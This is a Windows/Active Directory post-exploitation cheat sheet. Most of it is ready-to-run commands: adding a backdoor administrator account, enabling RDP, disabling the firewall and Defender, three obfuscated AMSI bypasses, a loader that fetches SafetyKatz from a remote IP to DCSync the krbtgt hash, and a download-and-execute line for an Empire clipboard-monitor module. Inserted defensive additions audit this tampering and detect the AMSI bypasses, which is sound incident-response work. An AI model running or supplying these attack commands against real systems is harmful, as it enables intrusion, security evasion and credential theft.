# Post Exploitation

## RDP Stuff

### Add Local Administrator

Create user **asuka** and add it to the Remote Desktop Users, Administrators, and Remote Management Users (WinRM) local groups.

{% code overflow="wrap" %}

```powershell
net user asuka 'TrYh@rdeR!' /add
net localgroup "Remote Desktop Users" asuka /add
net localgroup "Administrators" asuka /add
net localgroup "Remote Management Users" asuka /add
```

{% endcode %}

### Enable RDP Access

{% code overflow="wrap" %}

```powershell
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

# If PowerShell is not available (e.g. on an old machine), the same two changes from cmd:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
```

{% endcode %}

### Access RDP

{% code overflow="wrap" %}

```bash
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb /u:asuka /p:'TrYh@rdeR!' +nego /drive:Tools,/home/asuka/Tools/ActiveDirectory/
rdesktop support.htb

# fix ERRCONNECT_TLS_CONNECT_FAILED
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb /u:asuka /p:'TrYh@rdeR!' +nego /drive:Tools,/home/asuka/Tools/ActiveDirectory/ /tls-seclevel:0
```

{% endcode %}

## Defender and Firewall Stuff

### Turn Off Firewall

{% code overflow="wrap" %}

```powershell
# powershell
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
# cmd
netsh advfirewall set allprofiles state off
```

{% endcode %}

### Disable Defender Real Time Monitoring

{% code overflow="wrap" %}

```powershell
# Remove Defender Database
cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Get-MpComputerStatus
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -ExclusionExtension "ps1"
Set-MPPreference -DisableBehaviorMonitoring $true

# Disable AMSI (set to 0 to enable)
Set-MpPreference -DisableScriptScanning 1 

# Check all exclusion folder
Get-MpPreference | Select-Object -Property ExclusionPath -ExpandProperty ExclusionPath
# Add folder exclusion (in case tamper protection is enabled)
Add-MpPreference -ExclusionPath C:\Mimikatz\

# Disable Real Time Protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
```

{% endcode %}
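The three sections above (local admin creation, RDP enablement, firewall and Defender tampering) each leave a configuration or event trail. The following audit script is an added example, not code from the original page: it reports the current state of every setting those commands change and pulls the Defender and Security events that record such changes. It assumes Windows 10 / Server 2016 or later with the `Defender`, `NetSecurity` and `LocalAccounts` modules present, and an elevated session (the Security log and `Get-MpPreference` require it); the `$LookbackHours` parameter is this script's own.

```powershell
# Added audit example (not from the original page). Reports the host settings the
# post-exploitation commands above change, plus the events that record such changes.
# Assumes Windows 10 / Server 2016+ with the Defender, NetSecurity and LocalAccounts
# modules; run from an elevated PowerShell session.
param([int]$LookbackHours = 24)

$findings = New-Object System.Collections.Generic.List[string]

# --- RDP: fDenyTSConnections = 0 means RDP connections are allowed ---
$ts = Get-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -ErrorAction SilentlyContinue
if ($ts -and $ts.fDenyTSConnections -eq 0) { $findings.Add('RDP enabled (fDenyTSConnections=0)') }

# --- Firewall profiles that have been switched off ---
Get-NetFirewallProfile | Where-Object { $_.Enabled -eq 'False' } | ForEach-Object {
    $findings.Add("Firewall profile disabled: $($_.Name)")
}

# --- Defender engine state and preferences ---
$status = Get-MpComputerStatus
$pref   = Get-MpPreference
if (-not $status.RealTimeProtectionEnabled) { $findings.Add('Defender real-time protection is off') }
if (-not $status.BehaviorMonitorEnabled)    { $findings.Add('Defender behavior monitoring is off') }
if (-not $status.IoavProtectionEnabled)     { $findings.Add('Defender IOAV (download/attachment) scanning is off') }
if (-not $status.IsTamperProtected)         { $findings.Add('Tamper protection is not enabled') }
if ($pref.DisableScriptScanning)            { $findings.Add('Defender script scanning is disabled') }
foreach ($p in $pref.ExclusionPath)      { $findings.Add("Path exclusion: $p") }
foreach ($e in $pref.ExclusionExtension) { $findings.Add("Extension exclusion: $e") }
foreach ($x in $pref.ExclusionProcess)   { $findings.Add("Process exclusion: $x") }

# --- Policy registry values that force Defender off ---
$policy = Get-ItemProperty -Path 'HKLM:\Software\Policies\Microsoft\Windows Defender' -ErrorAction SilentlyContinue
foreach ($v in 'DisableAntiSpyware', 'DisableAntiVirus') {
    if ($policy -and $policy.$v -eq 1) { $findings.Add("Policy value $v=1 set under HKLM\Software\Policies\Microsoft\Windows Defender") }
}

# --- Membership of the local groups the "Add Local Administrator" commands touch ---
foreach ($g in 'Administrators', 'Remote Desktop Users', 'Remote Management Users') {
    Get-LocalGroupMember -Group $g -ErrorAction SilentlyContinue | ForEach-Object {
        $findings.Add("Member of '$g': $($_.Name) ($($_.PrincipalSource))")
    }
}

# --- Event evidence from the lookback window ---
$since = (Get-Date).AddHours(-$LookbackHours)
# Defender/Operational: 5001 real-time protection disabled, 5007 configuration changed,
# 5010 antispyware scanning disabled, 5012 antivirus scanning disabled,
# 5013 tamper protection blocked a change
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 5001, 5007, 5010, 5012, 5013; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object { $findings.Add("Defender event $($_.Id) at $($_.TimeCreated): $(($_.Message -split "`n")[0])") }
# Security: 4720 user account created, 4732 member added to a security-enabled local group
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720, 4732; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object { $findings.Add("Security event $($_.Id) at $($_.TimeCreated): $(($_.Message -split "`n")[0])") }

$findings | ForEach-Object { Write-Output $_ }
```

Run it as `.\Audit-HostTampering.ps1 -LookbackHours 48` (file name is the example's own). The registry and `Get-Mp*` checks show the state right now; the event queries show when it changed and, for 4720/4732, which account made the change, which is what an incident responder needs after finding a fresh local admin or an emptied exclusion list.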

### Bypassing PowerShell Security

Using InviShell - <https://github.com/OmerYa/Invisi-Shell>

{% code overflow="wrap" %}

```batch
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
```

{% endcode %}

### AMSI Bypass

Detection: <https://github.com/RythmStick/AMSITrigger>

{% tabs %}
{% tab title="2023" %}
{% code overflow="wrap" %}

```powershell
$a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.{0}{1}Utils'-f $b,$a)); $z=$Ref.GetField(('am{0}InitFailed'-f$a),'NonPublic,Static');$z.SetValue($null,$true)
```

{% endcode %}
{% endtab %}

{% tab title="CRTP" %}
{% code overflow="wrap" %}

```powershell
S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
```

{% endcode %}
{% endtab %}

{% tab title="Base64" %}
{% code overflow="wrap" %}

```powershell
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
```

{% endcode %}
{% endtab %}
{% endtabs %}
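All three variants above reach the same two reflection targets, `AmsiUtils` and `amsiInitFailed`; they differ only in how the strings are hidden (the `-f` format operator, backtick-split identifiers with fragment concatenation, or Base64). A detection that works on PowerShell Script Block Logging output (event 4104) therefore normalizes the text before matching. The following normalizer is an added example, not code from the original page or from AMSITrigger: it strips backticks, decodes `FromBase64String` calls, joins `'a'+'b'` fragments, substitutes simple `$var='...'` assignments, resolves `-f` templates, and then looks for the tokens. The three bypass strings from the page are embedded as sample input, alongside two constructed benign scripts.

```python
"""Normalize obfuscated PowerShell script-block text and flag AMSI-tampering reflection.

Added example (not from the original page). The detector handles exactly the
obfuscation layers used by the three bypass variants shown above.
"""
import base64
import re

AMSI_TOKENS = ("amsiutils", "amsiinitfailed")

# [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('...'))  ->  'decoded'
_B64_CALL = re.compile(
    r"\[Text\.Encoding\]::(\w+)\.GetString\(\[Convert\]::FromBase64String\('([A-Za-z0-9+/=]+)'\)\)"
)
_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")            # $a='si'
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")         # 'Am'+'si'
_PAREN = re.compile(r"(?<![\w.\]])\$?\(\s*('[^']*')\s*\)")  # ('x') or $('x'), not a call f('x')
_FORMAT = re.compile(                                       # "{1}{0}" -f 'a',('b')
    r"""(["'])([^"']*)\1\s*-[fF]\s*(\(?\s*'[^']*'\s*\)?(?:\s*,\s*\(?\s*'[^']*'\s*\)?)*)"""
)


def _decode_b64(match):
    encoding = {"Unicode": "utf-16-le", "ASCII": "ascii", "UTF8": "utf-8"}.get(match.group(1), "utf-8")
    try:
        return "'" + base64.b64decode(match.group(2)).decode(encoding) + "'"
    except (ValueError, UnicodeDecodeError):
        return match.group(0)


def _apply_format(match):
    template, args = match.group(2), re.findall(r"'([^']*)'", match.group(3))
    if any(int(i) >= len(args) for i in re.findall(r"\{(\d+)\}", template)):
        return match.group(0)  # arguments not fully resolved yet; retry on a later pass
    return "'" + re.sub(r"\{(\d+)\}", lambda m: args[int(m.group(1))], template) + "'"


def normalize(script):
    """Peel the obfuscation layers until the text stops changing."""
    text = script.replace("`", "")            # S`eT-It`em -> SeT-Item
    text = _B64_CALL.sub(_decode_b64, text)
    for _ in range(25):
        before = text
        assigns = dict(_ASSIGN.findall(text))  # $a='si' -> replace later uses of $a by 'si'
        if assigns:
            text = _ASSIGN.sub("", text)
            for name, value in assigns.items():
                text = re.sub(r"\$" + re.escape(name) + r"\b", lambda m, v=value: "'" + v + "'", text)
        text = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
        text = _PAREN.sub(lambda m: m.group(1), text)
        if text == before:                    # only resolve -f once its arguments are literals
            text = _FORMAT.sub(_apply_format, text)
            if text == before:
                break
    return text


def analyze(script):
    """Return the normalized text, obfuscation indicators and any AMSI tokens found."""
    normalized = normalize(script)
    lowered = normalized.lower()
    indicators = []
    if "`" in script:
        indicators.append("backtick-obfuscation")
    if "FromBase64String" in script:
        indicators.append("base64-string")
    if re.search(r"-[fF]\s*['$(]", script):
        indicators.append("format-operator")
    if "[ref].assembly.gettype" in script.replace("`", "").replace(" ", "").lower():
        indicators.append("reflection-via-ref")
    hits = [t for t in AMSI_TOKENS if t in lowered]
    return {"normalized": normalized, "indicators": indicators, "amsi_tokens": hits, "suspicious": bool(hits)}


# Sample input: the three variants from the page plus two constructed benign scripts.
SAMPLES = {
    "format_split": "$a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.{0}{1}Utils'-f $b,$a)); $z=$Ref.GetField(('am{0}InitFailed'-f$a),'NonPublic,Static');$z.SetValue($null,$true)",
    "crtp": """S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )""",
    "base64": "[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)",
    "benign": "Get-Process | Where-Object { $_.CPU -gt 100 } | Select-Object Name, Id",          # constructed
    "benign_format": "\"Disk {0} is {1}% full\" -f 'C:', '87'",                                 # constructed
}

if __name__ == "__main__":
    for name, script in SAMPLES.items():
        r = analyze(script)
        print(f"{name:14} suspicious={r['suspicious']} tokens={r['amsi_tokens']} indicators={r['indicators']}")
```

The point of the loop is that each obfuscation layer hides a different one of the others: the `-f` template cannot be resolved until its arguments have been concatenated, and the concatenation cannot run until the backticks and Base64 are gone. The `indicators` list is reported separately from the token match so that a benign `-f` in a logging script (the `benign_format` sample) is not flagged on its own.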

### OPSEC with Loader

{% code overflow="wrap" %}

```powershell
C:\AD\Tools\Loader.exe -path http://172.16.100.67/SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
```

{% endcode %}

### Get-ClipboardContents

Monitors the clipboard on a specified interval for changes to copied text.

{% code overflow="wrap" %}

```powershell
iex (iwr -usebasicparsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1);Get-ClipboardContents
```

{% endcode %}

### WADComs

WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.

* <https://wadcoms.github.io/>

### Dump Saved Password

* [BrowserStealer](https://github.com/SaulBerrenson/BrowserStealer)
* [LaZagne](https://github.com/AlessandroZ/LaZagne)
* Mimikatz

### TCP Port Scanner

{% code overflow="wrap" %}

```powershell
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("172.16.8.1",$_)) "Port $_ is open!"} 2>$null # powershell
```

{% endcode %}

### Ping Sweep

{% code overflow="wrap" %}

```batch
REM run from cmd.exe
for /l %i in (1,1,254) do @ping -n 1 -w 100 172.16.8.%i > nul && echo 172.16.8.%i is up.
```

{% endcode %}

### Inveigh

Responder, but in Powershell/C#

* <https://github.com/Kevin-Robertson/Inveigh>

### MDE Enum

How to extract Windows Defender Exclusions and Attack Surface Reduction (ASR) rules without Admin privileges

* <https://github.com/0xsp-SRD/MDE_Enum>

{% code overflow="wrap" %}

```powershell
# local
mde-enum.exe /local /paths /access
# remote
mde-enum.exe <ip> <username> <password> <domain> /paths
# e.g.
.\mde-enum.exe 172.16.8.148 asuka Asuka@1337 child.zerobyte.lab /paths
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-s8CjvYH04yAIm9dffLa8xRTnARSQR9gd8WKp6fZxTrQEMkCc-NAlewZB_1H5nAQzO4zxKf1FUQTfKLGKoTfTSIs6L3FmkbbMoXZggddyNVk5SlYwrqshBUKujEWox-CIOs25DspgkCVe9FQwcN8owuUqLZfh1JMlr0b3qawe1JMJMkyYbO_58cnPRX8/s872/mde-enum.png" alt=""><figcaption><p>MDE Enum</p></figcaption></figure>

Or use this PowerShell script, which reads Defender configuration-change events (ID 5007) from the Defender Operational log and pulls the exclusion paths out of their messages.

```powershell
# Defender records every configuration change as event ID 5007 in its Operational log;
# a new path exclusion shows up as a write under the Exclusions\Paths registry key.
$logName = "Microsoft-Windows-Windows Defender/Operational"
$eventID = 5007
$events = Get-WinEvent -FilterHashtable @{ LogName = $logName; Id = $eventID } -ErrorAction SilentlyContinue
$exclusionEvents = $events | Where-Object { $_.Message -match "Exclusions" }
# In a double-quoted PowerShell string "\\" stays as two characters, so the regex matches one backslash
$pattern = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\[^\s]+"
$exclusionEvents | ForEach-Object {
    if ($_.Message -match $pattern) {
        $Matches[0]   # the excluded path as written in the event message
    }
}
```

<figure><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizy7s-PGsq5vpXfy6QMsH7TTl3qm5lWLyL8oNYRVVa3vIjHK4EAg3gKIszCqdCjjm-LRAGNGmfpWkBvpRAg8MwWaL2J-2XKo6HdmwJpynygsbkUXmyg0M3ikgGyt5Hq1gga3GQA04CDqoMqRW6NZuFWP-D2rTnHrIrZNuszuphAH56xwx2x1XJtpGkaBw/s742/mde-enum-powershell.png" alt=""><figcaption><p>Enumerate Defender Exclusions</p></figcaption></figure>

Reference:

* <https://x.com/VakninHai/status/1796628601535652289>

### Other Useful Stuff

* <https://github.com/r3motecontrol/Ghostpack-CompiledBinaries>
* <https://github.com/Flangvik/SharpCollection>

